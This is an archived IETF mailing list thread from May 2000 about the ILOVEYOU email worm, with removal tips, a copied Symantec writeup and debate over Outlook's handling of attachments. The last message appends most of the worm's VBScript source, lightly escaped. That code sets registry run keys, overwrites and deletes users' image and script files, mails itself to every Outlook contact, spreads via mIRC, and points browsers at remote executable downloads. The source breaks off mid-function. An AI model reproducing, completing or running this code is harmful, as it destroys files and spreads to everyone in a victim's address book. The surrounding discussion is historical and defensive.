should also be deleted (key and folder) You will find most of the references
within the keys that control the system tray and startup control (Not the
program folder)
The Worm also creates an href for IE startup page which downloads the virus
again...THis should be changed AFTER all the above has been accomplished
Thw Worm also creates an HTML page LOVE-LETTER-FOR-YOU.TXT.html on your
local drive which contains ActiveX scripts which redistributes the worm..
Delete this file.
This worm seems to be a sort of application that creates the other files for
some sort of source code that utilizes applicaitons already installed on the
local drive to rewrite the worm into various forms.
I believe I have wiped out the virus, but I will keep checking...One method
of checking this status is the look at the mail que of your mail server and
look for e-mail without controls.
I have received an e-mail from someone else saying these additinal sites
with information regarding ILOVEYOU, I have yet to visit them.
http://www.securityfocus.com
http://www.datafellows.com/v-descs/love.htm
-----Original Message-----
From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 10:35 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]; Brian Duddy (E-mail);
Kevin Speilman (E-mail); Michael F. Young (E-mail); Perry Lewis
(E-mail); Robert E Sollmann (E-mail); Roger Shepheard (E-mail)
Subject: RE: VIRUS WARNING
The file subject: ILOVEYOU
Name of attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
DO NOT OPEN THE ATTACHMENT.
At this time very little is known about the virus. If you have opened the
file, please see your network administrator for help.
The following link to Symantec has info on what the file does to your
system.
http://www.symantec.com/avcenter/venc/data/vbs.loveletter.a.html
Since the webpage is too busy to access I am copying the text portions of
the webpage here
VBS.LoveLetter.A
This is an email worm, mIRC worm, and file infector.
Also known as:
Category: Worm
Infection length: 10307
Virus definitions: Pending
Threat assessment:
Damage:
High
Distribution:
High
Wildness:
High
Wild
Number of infections: More than 1000
Number of sites: More than 10
Geographic distribution: High
Threat containment: Moderate
Removal: Moderate
Damage Payload:
Large scale e-mailing: All the addresses in Microsoft Outlook address book
Degrades performance: May clog mail servers
Distribution
Subject of e-mail: ILOVEYOU
Name of attachment: LOVE-LETTER-FOR-YOU.TXT.vbs
Size of attachment: 10307
Technical description:
This is a preliminary writeup. The information contained within is to
provide as much information as possible at this time.
VBS.LoveLetter.A is an email worm, mIRC worm, and a file infector.
VBS.LoveLetter.A will use Microsoft Outlook and email itself out as an
attachment with the above subject line and attachment name. The body of the
message will be
kindly check the attached LOVELETTER coming from me.
The virus will also infect files with the following extensions: vbs, vbe,
js, jse, css, wsh, sct, hta, jpg, jpeg, mp3, and mp2
The virus will insert the following files:
MSKernel32.vbs in the Windows System directory
Win32DLL.vbs in the Windows directory
LOVE-LETTER-FOR-YOU.TXT.vbs in the Windows System directory
WinFAT32.EXE in the Internet download directory
WIN-BUGSFIX.EXE in the Internet download directory
script.ini in the mIRC directory
SARC recommends Administrators filter on the attachment name and Subject
line immediately.
This writeup will be verified and formalized within the hour.
Removal:
Delete found infected files.
Write-up by: Eric Chien
Updated: May 4, 2000
Tell a Friend about this Write-Up
-----Original Message-----
From: Scot Mc Pherson [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 9:27 AM
To: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: VIRUS WARNING
The is an e-mail virus going around. The subject of the e-mail is
ILOVEYOU...I suggest you delete it the moment you receive it.
-Scot Mc Pherson, N2UPA
-Sr. Network Analyst
-ClearAccess Communications
-Ph: 941.744.5757 ext. 210
-Fax: 941.744.0629
-mailto:[EMAIL PROTECTED]
-http://www.clearaccess.net
>From owner-ietf-outbound Thu May 4 12:50:13 2000
Received: by ietf.org (8.9.1a/8.9.1a) id MAA10976
for [EMAIL PROTECTED]; Thu, 4 May 2000 12:50:03 -0400 (EDT)
Received: from calcite.rhyolite.com (calcite.rhyolite.com [38.159.140.3])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA10761
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 12:42:15 -0400 (EDT)
Received: (from vjs@localhost)
by calcite.rhyolite.com (8.9.3/calcite) id KAA22187
for [EMAIL PROTECTED] env-from <vjs>;
Thu, 4 May 2000 10:42:13 -0600 (MDT)
Date: Thu, 4 May 2000 10:42:13 -0600 (MDT)
From: Vernon Schryver <[EMAIL PROTECTED]>
Message-Id: <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
Subject: RE: VIRUS WARNING
X-Loop: [EMAIL PROTECTED]
> From: Lillian Komlossy <[EMAIL PROTECTED]>
> The whole world will not switch over to Unix
> - the average user will always be more confortable with Windows
> unless Unix will at one point offer the same seamless user-friendliness.
> So it will always be a problem, one which cannot be solved by telling
> others not to use what they've accustomed to - and one which cannot be
> ignored.
The issue cannot be ignored, but it has nothing to do with UNIX. The
only connection with UNIX is that UNIX comes from the old tradition in
which design involved more than increasing already long lists of bullet
items that people with no knowledge or interest in computers think they
understand, but don't and don't care that they don't.
The issue is that the Internet is not merely a big but private corporate
internet such as the one in Redmond. Authentication and authorization
are not the same things. That which is most convenient or "user-friendly"
is not safe enough, whether it is using ActiveX to update software from
AOL/Netscape or Microsoft headquarters without the informed consent of
the local user, not requiring the informed local consent before running
the latest dancing baby email attachment, or many other things including
those that are called viruses but that don't differ significantly.
Vernon Schryver [EMAIL PROTECTED]
>From owner-ietf-outbound Thu May 4 13:00:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA11214
for [EMAIL PROTECTED]; Thu, 4 May 2000 13:00:03 -0400 (EDT)
Received: from smtpgw2.sprintspectrum.com (smtpgw2.sprintspectrum.com [208.18.119.43])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id MAA10944
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 12:48:38 -0400 (EDT)
Received: from pkcex004.sprintspectrum.com (pkcex004.sprintspectrum.com
[208.10.75.139])
by smtpgw2.sprintspectrum.com (8.9.3/8.9.3) with ESMTP id LAA07899;
Thu, 4 May 2000 11:48:27 -0500 (CDT)
Received: by pkcex004.sprintspectrum.com with Internet Mail Service (5.5.2650.21)
id <K2Y62MH5>; Thu, 4 May 2000 11:48:27 -0500
Message-ID: <[EMAIL PROTECTED]>
From: "Lipford, Mark" <[EMAIL PROTECTED]>
To: "'Lillian Komlossy'" <[EMAIL PROTECTED]>,
"'[EMAIL PROTECTED]'"
<[EMAIL PROTECTED]>
Subject: RE: VIRUS WARNING
Date: Thu, 4 May 2000 11:48:24 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
charset="ISO-8859-1"
X-Loop: [EMAIL PROTECTED]
This discussion is a bad as the virus. Can we take it off this list and
have it individually please?
Mark A. Lipford
-----Original Message-----
From: Lillian Komlossy [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 11:02 AM
To: '[EMAIL PROTECTED]'
Subject: RE: VIRUS WARNING
Donald,
The whole world will not switch over to Unix
- the average user will always be more confortable with
Windows
unless Unix will at one point offer the same seamless
user-friendliness.
So it will always be a problem, one which cannot be solved
by telling
others not to use what they've accustomed to - and one which
cannot be
ignored.
Lillian Komlossy
Site Manager
http://www.dmnews.com
http://www.imarketingnews.com
(212) 925-7300 ext. 232
-----Original Message-----
From: Donald E. Eastlake 3rd
[mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 10:48 AM
To: [EMAIL PROTECTED]
Subject: Re: VIRUS WARNING
The whole world does not run software which is a good
culture medium
for email viruses. I mostly use nice old UNIX software and
it would
take a number of extra steps on my part for some embdedded
virus to
get a chance to run. If your software automatically
executes stuff
in attachments, you need to change your software, not
develope a list
of subject lines you are freightened of.
Donald
From: "Scot Mc Pherson" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>, <[EMAIL PROTECTED]>
Date: Thu, 4 May 2000 09:27:19 -0400
Message-ID:
<00cf01bfb5cc$79bc4280$[EMAIL PROTECTED]>
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Importance: Normal
In-Reply-To: <[EMAIL PROTECTED]>
Content-Transfer-Encoding: 7bit
X-Loop: [EMAIL PROTECTED]
Content-Transfer-Encoding: 7bit
>The is an e-mail virus going around. The subject of the
e-mail is
>ILOVEYOU...I suggest you delete it the moment you receive
it.
>
>-Scot Mc Pherson, N2UPA
>-Sr. Network Analyst
>-ClearAccess Communications
>-Ph: 941.744.5757 ext. 210
>-Fax: 941.744.0629
>-mailto:[EMAIL PROTECTED]
>-http://www.clearaccess.net
>
>From owner-ietf-outbound Thu May 4 13:10:18 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA11751
for [EMAIL PROTECTED]; Thu, 4 May 2000 13:10:03 -0400 (EDT)
Received: from apollo.dmnews.com (mail.dmnews.com [204.141.161.2])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA11696
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 13:07:32 -0400 (EDT)
Received: by mail.dmnews.com with Internet Mail Service (5.5.2448.0)
id <HNLHMTZL>; Thu, 4 May 2000 13:14:00 -0400
Message-ID: <[EMAIL PROTECTED]>
From: Lillian Komlossy <[EMAIL PROTECTED]>
To: "'Keith Moore'" <[EMAIL PROTECTED]>
Cc: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>,
"'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: RE: THe Value Of Following Standards... (was Re: VIRUS WARNING)
Date: Thu, 4 May 2000 13:13:59 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2448.0)
Content-Type: text/plain;
charset="iso-8859-1"
X-Loop: [EMAIL PROTECTED]
I don't know about deliberate inclusion of the security hole - it looks
more to me like "careless". Feels like it just "was not thought to be
a danger of any kind to security"... (Does the word TITANIC mean anything to
you?)
Lillian Komlossy
Site Manager
http://www.dmnews.com
http://www.imarketingnews.com
(212) 925-7300 ext. 232
-----Original Message-----
From: Keith Moore [mailto:[EMAIL PROTECTED]]
Sent: Thursday, May 04, 2000 11:58 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]; [EMAIL PROTECTED]
Subject: Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
> So if your e-mail software is opening it and feeding it to Visual Basic
> just because it's tagged .vbs even though it's a text/plain, you're
> violating the RFCs.
well there's nothing illegal about violating RFCs.
but it sure seems like the deliberate inclusion of a security hole in
email software would be sufficient grounds for a class action lawsuit.
Keith
>From owner-ietf-outbound Thu May 4 13:40:10 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA12504
for [EMAIL PROTECTED]; Thu, 4 May 2000 13:40:02 -0400 (EDT)
Received: from prue.eim.surrey.ac.uk (IDENT:[EMAIL PROTECTED] [131.227.76.5])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA12461
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 13:37:21 -0400 (EDT)
Received: from petra.ee.surrey.ac.uk ([131.227.88.13] ident=eep1lw)
by prue.eim.surrey.ac.uk with esmtp (Exim 3.03 #1)
id 12nPYs-0006vn-00; Thu, 04 May 2000 18:37:18 +0100
Date: Thu, 4 May 2000 18:37:15 +0100 (BST)
From: Lloyd Wood <[EMAIL PROTECTED]>
X-Sender: [EMAIL PROTECTED]
Reply-To: [EMAIL PROTECTED]
To: Lillian Komlossy <[EMAIL PROTECTED]>
cc: "'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: RE: THe Value Of Following Standards... (was Re: VIRUS WARNING)
In-Reply-To: <[EMAIL PROTECTED]>
Message-ID: <[EMAIL PROTECTED]>
Organization: speaking for none
X-url: http://www.ee.surrey.ac.uk/Personal/L.Wood/
X-no-archive: yes
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
X-Loop: [EMAIL PROTECTED]
On Thu, 4 May 2000, Lillian Komlossy wrote:
> I don't know about deliberate inclusion of the security hole - it looks
> more to me like "careless". Feels like it just "was not thought to be
> a danger of any kind to security"... (Does the word TITANIC mean anything to
> you?)
They should have called it Marko Polo: the ship with the hole.
L.
a viral CFP would wrap all this up nicely.
<[EMAIL PROTECTED]>PGP<http://www.ee.surrey.ac.uk/Personal/L.Wood/>
>From owner-ietf-outbound Thu May 4 13:50:10 2000
Received: by ietf.org (8.9.1a/8.9.1a) id NAA12671
for [EMAIL PROTECTED]; Thu, 4 May 2000 13:50:02 -0400 (EDT)
Received: from astro.cs.utk.edu (ASTRO.CS.UTK.EDU [128.169.93.168])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA12586
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 13:44:21 -0400 (EDT)
Received: from astro.cs.utk.edu (LOCALHOST [127.0.0.1])
by astro.cs.utk.edu (cf 8.9.3) with ESMTP id NAA23364;
Thu, 4 May 2000 13:44:15 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-URI: http://www.cs.utk.edu/~moore/
From: Keith Moore <[EMAIL PROTECTED]>
To: Lillian Komlossy <[EMAIL PROTECTED]>
cc: "'Keith Moore'" <[EMAIL PROTECTED]>,
"'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>,
"'[EMAIL PROTECTED]'" <[EMAIL PROTECTED]>
Subject: Re: THe Value Of Following Standards... (was Re: VIRUS WARNING)
In-reply-to: Your message of "Thu, 04 May 2000 13:13:59 EDT."
<[EMAIL PROTECTED]>
Date: Thu, 04 May 2000 13:44:15 -0400
Sender: [EMAIL PROTECTED]
X-Loop: [EMAIL PROTECTED]
> I don't know about deliberate inclusion of the security hole - it looks
> more to me like "careless". Feels like it just "was not thought to be
> a danger of any kind to security"... (Does the word TITANIC mean anything to
> you?)
the builders of the titanic didn't know that certain kinds of steel
become brittle at cold temperatures.
otoh, the developers of this user agent knew, or should have known,
the risks of executing code of unknown origin. they have been
understood for a long time. they were discussed during development
of the MIME standard. the MIME specs have required content-types to
document known security risks since the early 1990s. other email-borne
viruses have used similar mechanisms to this one to propagte themselves.
Keith
>From owner-ietf-outbound Thu May 4 14:03:03 2000
Received: by ietf.org (8.9.1a/8.9.1a) id OAA12958
for [EMAIL PROTECTED]; Thu, 4 May 2000 14:02:58 -0400 (EDT)
Received: from torque.pothole.com ([209.94.126.195])
by ietf.org (8.9.1a/8.9.1a) with ESMTP id NAA12718
for <[EMAIL PROTECTED]>; Thu, 4 May 2000 13:52:03 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1])
by torque.pothole.com (8.8.2/8.8.8) with SMTP id NAA03235
for [EMAIL PROTECTED]; Thu, 4 May 2000 13:53:35 -0400 (EDT)
Message-Id: <[EMAIL PROTECTED]>
X-Authentication-Warning: torque.pothole.com: localhost [127.0.0.1] didn't use HELO
protocol
To: [EMAIL PROTECTED]
Subject: Security insanity
Date: Thu, 04 May 2000 13:53:34 -0400
From: "Donald E. Eastlake 3rd" <[EMAIL PROTECTED]>
X-Mts: smtp
X-Loop: [EMAIL PROTECTED]
It's not switching to UNIX, its avoiding secuirty insanity like
AcitveX, self-extracting binaries, automatically executing attachemnts
on opening on opening mail, as apparently Outlook does, etc. A few
seconds thought would tell anyone with a clue what a bad idea these
are.
It is just insane that vast parts of the computing capacity of the world
can be damaged this badly and this trivially.
Donald
PS: Appended below is the virus in a hopefully non-virulent form.
>Donald,
>The whole world will not switch over to Unix
>- the average user will always be more confortable with Windows
>unless Unix will at one point offer the same seamless user-friendliness.
>So it will always be a problem, one which cannot be solved by telling
>others not to use what they've accustomed to - and one which cannot be
>ignored.
>
>Lillian Komlossy
>Site Manager
>http://www.dmnews.com
>http://www.imarketingnews.com
>(212) 925-7300 ext. 232
=====================================================================
Donald E. Eastlake 3rd [EMAIL PROTECTED]
140 Forest Avenue +1 914-276-2668(h)
Hudson, MA 01749 USA +1 508-261-5434(w)
q MIME-Version: 1.0
q X-Mailer: Internet Mail Service (5.5.2448.0)
q Content-Type: multipart/mixed;
q boundary="----_=_NextPart_000_01BFB5DE.957A65A0"
q
q This message is in MIME format. Since your mail reader does not understand
q this format, some or all of this message may not be legible.
q
q ------_=_NextPart_000_01BFB5DE.957A65A0
q Content-Type: text/plain
q
q
q kindly check the attached LOVELETTER coming from me.
q
q
q ------_=_NextPart_000_01BFB5DE.957A65A0
q Content-Type: application/octet-stream;
q name="LOVE-LETTER-FOR-YOU.TXT.vbs"
q Content-Transfer-Encoding: quoted-printable
q Content-Disposition: attachment;
q filename="LOVE-LETTER-FOR-YOU.TXT.vbs"
q
q rem barok -loveletter(vbe) <i hate go to school>
q rem by: spyder / [EMAIL PROTECTED] / @GRAMMERSoft Group / =
q Manila,Philippines
q On Error Resume Next
q dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
q eq=3D""
q ctr=3D0
q Set fso =3D CreateObject("Scripting.FileSystemObject")
q set file =3D fso.OpenTextFile(WScript.ScriptFullname,1)
q vbscopy=3Dfile.ReadAll
q main()
q sub main()
q On Error Resume Next
q dim wscr,rr
q set wscr=3DCreateObject("WScript.Shell")
q rr=3Dwscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows =
q Scripting Host\Settings\Timeout")
q if (rr>=3D1) then
q wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting =
q Host\Settings\Timeout",0,"REG_DWORD"
q end if
q Set dirwin =3D fso.GetSpecialFolder(0)
q Set dirsystem =3D fso.GetSpecialFolder(1)
q Set dirtemp =3D fso.GetSpecialFolder(2)
q Set c =3D fso.GetFile(WScript.ScriptFullName)
q c.Copy(dirsystem&"\MSKernel32.vbs")
q c.Copy(dirwin&"\Win32DLL.vbs")
q c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
q regruns()
q html()
q spreadtoemail()
q listadriv()
q end sub
q sub regruns()
q On Error Resume Next
q Dim num,downread
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKern=
q el32",dirsystem&"\MSKernel32.vbs"
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunService=
q s\Win32DLL",dirwin&"\Win32DLL.vbs"
q downread=3D""
q downread=3Dregget("HKEY_CURRENT_USER\Software\Microsoft\Internet =
q Explorer\Download Directory")
q if (downread=3D"") then
q downread=3D"c:\"
q end if
q if (fileexist(dirsystem&"\WinFAT32.exe")=3D1) then
q Randomize
q num =3D Int((4 * Rnd) + 1)
q if num =3D 1 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfm=
q hPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
q elseif num =3D 2 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqw=
q erWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
q elseif num =3D 3 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBd=
q QZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"
q elseif num =3D 4 then
q regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start =
q Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSD=
q GjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN=
q -BUGSFIX.exe"
q end if
q end if
q if (fileexist(downread&"\WIN-BUGSFIX.exe")=3D0) then
q regcreate =
q "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BU=
q GSFIX",downread&"\WIN-BUGSFIX.exe"
q regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet =
q Explorer\Main\Start Page","about:blank"
q end if
q end sub
q sub listadriv
q On Error Resume Next
q Dim d,dc,s
q Set dc =3D fso.Drives
q For Each d in dc
q If d.DriveType =3D 2 or d.DriveType=3D3 Then
q folderlist(d.path&"\")
q end if
q Next
q listadriv =3D s
q end sub
q sub infectfiles(folderspec) =20
q On Error Resume Next
q dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
q set f =3D fso.GetFolder(folderspec)
q set fc =3D f.Files
q for each f1 in fc
q ext=3Dfso.GetExtensionName(f1.path)
q ext=3Dlcase(ext)
q s=3Dlcase(f1.name)
q if (ext=3D"vbs") or (ext=3D"vbe") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q elseif(ext=3D"js") or (ext=3D"jse") or (ext=3D"css") or (ext=3D"wsh") =
q or (ext=3D"sct") or (ext=3D"hta") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q bname=3Dfso.GetBaseName(f1.path)
q set cop=3Dfso.GetFile(f1.path)
q cop.copy(folderspec&"\"&bname&".vbs")
q fso.DeleteFile(f1.path)
q elseif(ext=3D"jpg") or (ext=3D"jpeg") then
q set ap=3Dfso.OpenTextFile(f1.path,2,true)
q ap.write vbscopy
q ap.close
q set cop=3Dfso.GetFile(f1.path)
q cop.copy(f1.path&".vbs")
q fso.DeleteFile(f1.path)
q elseif(ext=3D"mp3") or (ext=3D"mp2") then
q set mp3=3Dfso.CreateTextFile(f1.path&".vbs")
q mp3.write vbscopy
q mp3.close
q set att=3Dfso.GetFile(f1.path)
q att.attributes=3Datt.attributes+2
q end if
q if (eq<>folderspec) then
q if (s=3D"mirc32.exe") or (s=3D"mlink32.exe") or (s=3D"mirc.ini") or =
q (s=3D"script.ini") or (s=3D"mirc.hlp") then
q set scriptini=3Dfso.CreateTextFile(folderspec&"\script.ini")
q scriptini.WriteLine "[script]"
q scriptini.WriteLine ";mIRC Script"
q scriptini.WriteLine "; Please dont edit this script... mIRC will =
q corrupt, if mIRC will"
q scriptini.WriteLine " corrupt... WINDOWS will affect and will not =
q run correctly. thanks"
q scriptini.WriteLine ";"
q scriptini.WriteLine ";Khaled Mardam-Bey"
q scriptini.WriteLine ";http://www.mirc.com"
q scriptini.WriteLine ";"
q scriptini.WriteLine "n0=3Don 1:JOIN:#:{"
q scriptini.WriteLine "n1=3D /if ( $nick =3D=3D $me ) { halt }"
q scriptini.WriteLine "n2=3D /.dcc send $nick =
q "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
q scriptini.WriteLine "n3=3D}"
q scriptini.close
q eq=3Dfolderspec
q end if
q end if
q next =20
q end sub
q sub folderlist(folderspec) =20
q On Error Resume Next
q dim f,f1,sf
q set f =3D fso.GetFolder(folderspec) =20
q set sf =3D f.SubFolders
q for each f1 in sf
q infectfiles(f1.path)
q folderlist(f1.path)
q next =20
q end sub
q sub regcreate(regkey,regvalue)
q Set regedit =3D CreateObject("WScript.Shell")
q regedit.RegWrite regkey,regvalue
q end sub
q function regget(value)
q Set regedit =3D CreateObject("WScript.Shell")
q regget=3Dregedit.RegRead(value)
q end function
q function fileexist(filespec)
q On Error Resume Next
q dim msg
q if (fso.FileExists(filespec)) Then
q msg =3D 0
q else
q msg =3D 1
q end if
q fileexist =3D msg
q end function
q function folderexist(folderspec)
q On Error Resume Next
q dim msg
q if (fso.GetFolderExists(folderspec)) then
q msg =3D 0
q else
q msg =3D 1
q end if
q fileexist =3D msg
q end function
q sub spreadtoemail()
q On Error Resume Next
q dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
q set regedit=3DCreateObject("WScript.Shell")
q set out=3DWScript.CreateObject("Outlook.Application")
q set mapi=3Dout.GetNameSpace("MAPI")
q for ctrlists=3D1 to mapi.AddressLists.Count
q set a=3Dmapi.AddressLists(ctrlists)
q x=3D1
q regv=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
q if (regv=3D"") then
q regv=3D1
q end if
q if (int(a.AddressEntries.Count)>int(regv)) then
q for ctrentries=3D1 to a.AddressEntries.Count
q malead=3Da.AddressEntries(x)
q regad=3D""
q regad=3Dregedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&male=
q ad)
q if (regad=3D"") then
q set male=3Dout.CreateItem(0)
q male.Recipients.Add(malead)
q male.Subject =3D "ILOVEYOU"
q male.Body =3D vbcrlf&"kindly check the attached LOVELETTER coming from =
q me."
q male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
q male.Send
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
q end if
q x=3Dx+1
q next
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
q else
q regedit.RegWrite =
q "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
q end if
q next
q Set out=3DNothing
q Set mapi=3DNothing
q end sub
q sub html
q On Error Resume Next
q dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
q dta1=3D"<HTML><HEAD><TITLE>LOVELETTER - HTML<?-?TITLE><META =
q NAME=3D@-@Generator@-@ CONTENT=3D@-@BAROK VBS - LOVELETTER@-@>"&vbcrlf& =
q _
q "<META NAME=3D@-@Author@-@ CONTENT=3D@-@spyder ?-? [EMAIL PROTECTED] ?-? =
q @GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@>"&vbcrlf& =
q _
q "<META NAME=3D@-@Description@-@ CONTENT=3D@-@simple but i think this is =
q good...@-@>"&vbcrlf& _
q "<?-?HEAD><BODY =
q ONMOUSEOUT=3D@[EMAIL PROTECTED]=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
q YOU.HTM#-#,#-#main#-#)@-@ "&vbcrlf& _
q "ONKEYDOWN=3D@[EMAIL PROTECTED]=3D#-#main#-#;window.open(#-#LOVE-LETTER-FOR-=
q YOU.HTM#-#,#-#main#-#)@-@ BGPROPERTIES=3D@-@fixed@-@ =
q BGCOLOR=3D@-@#FF9933@-@>"&vbcrlf& _
q "<CENTER><p>This HTML file need ActiveX Control<?-?p><p>To Enable to =
q read this HTML file<BR>- Please press #-#YES#-# button to Enable =
q ActiveX<?-?p>"&vbcrlf& _
q "<?-?CENTER><MARQUEE LOOP=3D@-@infinite@-@ =
q BGCOLOR=3D@-@yellow@-@>----------z--------------------z----------<?-?MAR=
q QUEE> "&vbcrlf& _
q "<?-?BODY><?-?HTML>"&vbcrlf& _
q "<SCRIPT language=3D@-@JScript@-@>"&vbcrlf& _
q "<!--?-??-?"&vbcrlf& _
q "if (window.screen){var wi=3Dscreen.availWidth;var =
q hi=3Dscreen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&vbc=
q rlf& _
q "?-??-?-->"&vbcrlf& _
q "<?-?SCRIPT>"&vbcrlf& _
q "<SCRIPT LANGUAGE=3D@-@VBScript@-@>"&vbcrlf& _
q "<!--"&vbcrlf& _
q "on error resume next"&vbcrlf& _
q "dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&vbcrlf& _
q "aw=3D1"&vbcrlf& _
q "code=3D"
q dta2=3D"set =
q fso=3DCreateObject(@[EMAIL PROTECTED]@-@)"&vbcrlf& _
q "set dirsystem=3Dfso.GetSpecialFolder(1)"&vbcrlf& _
q "code2=3Dreplace(code,chr(91)&chr(45)&chr(91),chr(39))"&vbcrlf& _
q "code3=3Dreplace(code2,chr(93)&chr(45)&chr(93),chr(34))"&vbcrlf& _
q "code4=3Dreplace(code3,chr(37)&chr(45)&chr(37),chr(92))"&vbcrlf& _
q "set =
q wri=3Dfso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf& _
q "wri.write code4"&vbcrlf& _
q "wri.close"&vbcrlf& _
q "if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@)) then"&vbcrlf& _
q "if (err.number=3D424) then"&vbcrlf& _
q "aw=3D0"&vbcrlf& _
q "end if"&vbcrlf& _
q "if (aw=3D1) then"&vbcrlf& _
q "document.write @-@ERROR: can#-#t initialize ActiveX@-@"&vbcrlf& _
q "window.close"&vbcrlf& _
q "end if"&vbcrlf& _
q "end if"&vbcrlf& _
q "Set regedit =3D CreateObject(@[EMAIL PROTECTED]@-@)"&vbcrlf& _
q "regedit.RegWrite =
q @-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^=
q -^Run^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
q "?-??-?-->"&vbcrlf& _
q "<?-?SCRIPT>"
q dt1=3Dreplace(dta1,chr(35)&chr(45)&chr(35),"'")
q dt1=3Dreplace(dt1,chr(64)&chr(45)&chr(64),"""")
q dt4=3Dreplace(dt1,chr(63)&chr(45)&chr(63),"/")
q dt5=3Dreplace(dt4,chr(94)&chr(45)&chr(94),"\")
q dt2=3Dreplace(dta2,chr(35)&chr(45)&chr(35),"'")
q dt2=3Dreplace(dt2,chr(64)&chr(45)&chr(64),"""")
q dt3=3Dreplace(dt2,chr(63)&chr(45)&chr(63),"/")
q dt6=3Dreplace(dt3,chr(94)&chr(45)&chr(94),"\")
q set fso=3DCreateObject("Scripting.FileSystemObject")
q set c=3Dfso.OpenTextFile(WScript.ScriptFullName,1)
q lines=3DSplit(c.ReadAll,vbcrlf)
q l1=3Dubound(lines)
q for n=3D0 to ubound(lines)
q lines(n)=3Dreplace(lines(n),"'",chr(91)+chr(45)+chr(91))
q lines(n)=3Dreplace(lines(n),"""",chr(93)+chr(45)+chr(93))
q lines(n)=3Dreplace(lines(n),"\",chr(37)+chr(45)+chr(37))
q if (l1=3Dn) then
q lines(n)=3Dchr(34)+lines(n)+chr(34)
q else
